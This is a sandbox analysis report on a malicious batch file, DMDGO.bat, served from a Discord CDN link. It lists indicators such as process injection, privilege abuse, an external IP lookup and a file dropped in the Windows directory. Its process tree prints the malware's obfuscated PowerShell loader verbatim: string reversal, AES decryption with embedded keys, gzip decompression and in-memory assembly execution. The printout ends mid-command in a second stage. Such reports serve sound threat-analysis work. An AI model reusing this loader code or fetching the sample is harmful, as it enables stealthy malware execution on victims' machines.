hxxps://cdn[.]discordapp[.]com/attachments/1058075051972374679/1063553574681972906/DMDGO[.]bat

Resubmissions

16/02/2023, 21:09

230216-zzwbgsca77 1

13/01/2023, 20:23

230113-y6efwagf5s 10

Analysis

max time kernel
57s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
13/01/2023, 20:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1058075051972374679/1063553574681972906/DMDGO.bat

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4268 created 604	4268	DMDGO.bat.exe	5
PID 2748 created 604	2748	DMDGO.bat.exe	5
PID 1732 created 604	1732	$sxr-powershell.exe	5
PID 4496 created 604	4496	$sxr-powershell.exe	5
PID 3136 created 604	3136	DMDGO (1).bat.exe	5

Executes dropped EXE 10 IoCs

pid	Process
4268	DMDGO.bat.exe
2748	DMDGO.bat.exe
1732	$sxr-powershell.exe
4496	$sxr-powershell.exe
3136	DMDGO (1).bat.exe
1412	$sxr-powershell.exe
1232	$sxr-powershell.exe
5144	$sxr-powershell.exe
5240	$sxr-powershell.exe
5340	$sxr-powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
132	api.ipify.org
131	api.ipify.org

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4268 set thread context of 3268	4268	DMDGO.bat.exe	114
PID 2748 set thread context of 616	2748	DMDGO.bat.exe	119
PID 1732 set thread context of 2460	1732	$sxr-powershell.exe	120
PID 4496 set thread context of 5004	4496	$sxr-powershell.exe	125
PID 3136 set thread context of 5180	3136	DMDGO (1).bat.exe	133

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-powershell.exe	DMDGO.bat.exe
File created	C:\Windows\$sxr-powershell.exe	DMDGO.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	DMDGO.bat.exe
File created	C:\Windows\$sxr-powershell.exe	DMDGO.bat.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5628	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5384	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3080	chrome.exe
3080	chrome.exe
4940	chrome.exe
4940	chrome.exe
660	chrome.exe
660	chrome.exe
4760	chrome.exe
4760	chrome.exe
1464	chrome.exe
1464	chrome.exe
2484	chrome.exe
2484	chrome.exe
4268	DMDGO.bat.exe
4268	DMDGO.bat.exe
4268	DMDGO.bat.exe
4268	DMDGO.bat.exe
3268	dllhost.exe
3268	dllhost.exe
3268	dllhost.exe
3268	dllhost.exe
4268	DMDGO.bat.exe
4268	DMDGO.bat.exe
2748	DMDGO.bat.exe
2748	DMDGO.bat.exe
2748	DMDGO.bat.exe
1732	$sxr-powershell.exe
1732	$sxr-powershell.exe
1732	$sxr-powershell.exe
2748	DMDGO.bat.exe
616	dllhost.exe
616	dllhost.exe
616	dllhost.exe
616	dllhost.exe
1732	$sxr-powershell.exe
2460	dllhost.exe
2460	dllhost.exe
2460	dllhost.exe
2460	dllhost.exe
2748	DMDGO.bat.exe
2748	DMDGO.bat.exe
3132	chrome.exe
3132	chrome.exe
4496	$sxr-powershell.exe
4496	$sxr-powershell.exe
4496	$sxr-powershell.exe
4496	$sxr-powershell.exe
5004	dllhost.exe
5004	dllhost.exe
5004	dllhost.exe
5004	dllhost.exe
4772	chrome.exe
4772	chrome.exe
4496	$sxr-powershell.exe
4496	$sxr-powershell.exe
3136	DMDGO (1).bat.exe
3136	DMDGO (1).bat.exe
3136	DMDGO (1).bat.exe
1412	$sxr-powershell.exe
1412	$sxr-powershell.exe
1232	$sxr-powershell.exe
1232	$sxr-powershell.exe
1232	$sxr-powershell.exe
3136	DMDGO (1).bat.exe
1412	$sxr-powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	4268	DMDGO.bat.exe
Token: SeDebugPrivilege	4268	DMDGO.bat.exe
Token: SeDebugPrivilege	3268	dllhost.exe
Token: SeDebugPrivilege	2748	DMDGO.bat.exe
Token: SeDebugPrivilege	1732	$sxr-powershell.exe
Token: SeDebugPrivilege	2748	DMDGO.bat.exe
Token: SeDebugPrivilege	616	dllhost.exe
Token: SeDebugPrivilege	1732	$sxr-powershell.exe
Token: SeDebugPrivilege	2460	dllhost.exe
Token: SeDebugPrivilege	4496	$sxr-powershell.exe
Token: SeDebugPrivilege	4496	$sxr-powershell.exe
Token: SeDebugPrivilege	5004	dllhost.exe
Token: SeDebugPrivilege	3136	DMDGO (1).bat.exe
Token: SeDebugPrivilege	1412	$sxr-powershell.exe
Token: SeDebugPrivilege	1232	$sxr-powershell.exe
Token: SeDebugPrivilege	3136	DMDGO (1).bat.exe
Token: SeDebugPrivilege	5180	dllhost.exe
Token: SeDebugPrivilege	5144	$sxr-powershell.exe
Token: SeDebugPrivilege	5240	$sxr-powershell.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe
4940	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 3804	4940	chrome.exe	83
PID 4940 wrote to memory of 3804	4940	chrome.exe	83
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3664	4940	chrome.exe	86
PID 4940 wrote to memory of 3080	4940	chrome.exe	87
PID 4940 wrote to memory of 3080	4940	chrome.exe	87
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88
PID 4940 wrote to memory of 4832	4940	chrome.exe	88

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3928	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{db18cca5-5f55-489b-a47f-39aacff159c6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3268
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cf2b1a6f-46fd-431b-ad91-54a2d8c7e320}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:616
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e22ddc15-5924-469b-952a-1563608540ed}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9821c5ab-a9e9-4591-89d2-2510286c1062}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{eb14fee0-fb65-44fd-9370-bb2a0d180d7e}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5180
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{794f6498-814e-40d0-9bfe-a827c0561468}
  2⤵
  PID:5952
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cbda2399-81d5-4d78-b965-17362023bc85}
  2⤵
  PID:6136
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0897acfd-e4e1-45c9-87bf-5889ebb9bb65}
  2⤵
  PID:5248
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5dd39ac6-66e2-4f76-84e3-f41a88e2819d}
  2⤵
  PID:5676
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{66d9f091-5bca-4b1c-a7be-0851c80e8f20}
  2⤵
  PID:2680
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0c3c2637-3ba9-4152-9d25-72f0b9deea67}
  2⤵
  PID:644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cdn.discordapp.com/attachments/1058075051972374679/1063553574681972906/DMDGO.bat
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4aae4f50,0x7ffe4aae4f60,0x7ffe4aae4f70
  2⤵
  PID:3804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1680 /prefetch:2
  2⤵
  PID:3664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2000 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:8
  2⤵
  PID:4832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:8
  2⤵
  PID:3108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:8
  2⤵
  PID:1540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DMDGO.bat" "
  2⤵
  PID:3308
- - C:\Users\Admin\Downloads\DMDGO.bat.exe
    "DMDGO.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $nxdhd = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\DMDGO.bat').Split([Environment]::NewLine);foreach ($rTzZT in $nxdhd) { if ($rTzZT.StartsWith(':: ')) { $pCAAj = $rTzZT.Substring(3); break; }; };$ROVJm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pCAAj);$rlWJv = New-Object System.Security.Cryptography.AesManaged;$rlWJv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$rlWJv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$rlWJv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d2UWzdiZOTW5ZCshp72vi/mVJM4Qox0RYc8nklPpZvs=');$rlWJv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1G2XQl2tD4JzwuN8NXDAbw==');$daxDH = $rlWJv.CreateDecryptor();$ROVJm = $daxDH.TransformFinalBlock($ROVJm, 0, $ROVJm.Length);$daxDH.Dispose();$rlWJv.Dispose();$mliXE = New-Object System.IO.MemoryStream(, $ROVJm);$zgBXo = New-Object System.IO.MemoryStream;$RTyqi = New-Object System.IO.Compression.GZipStream($mliXE, [IO.Compression.CompressionMode]::Decompress);$RTyqi.CopyTo($zgBXo);$RTyqi.Dispose();$mliXE.Dispose();$zgBXo.Dispose();$ROVJm = $zgBXo.ToArray();$xxbYH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ROVJm);$rtDoN = $xxbYH.EntryPoint;$rtDoN.Invoke($null, (, [string[]] ('')))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = 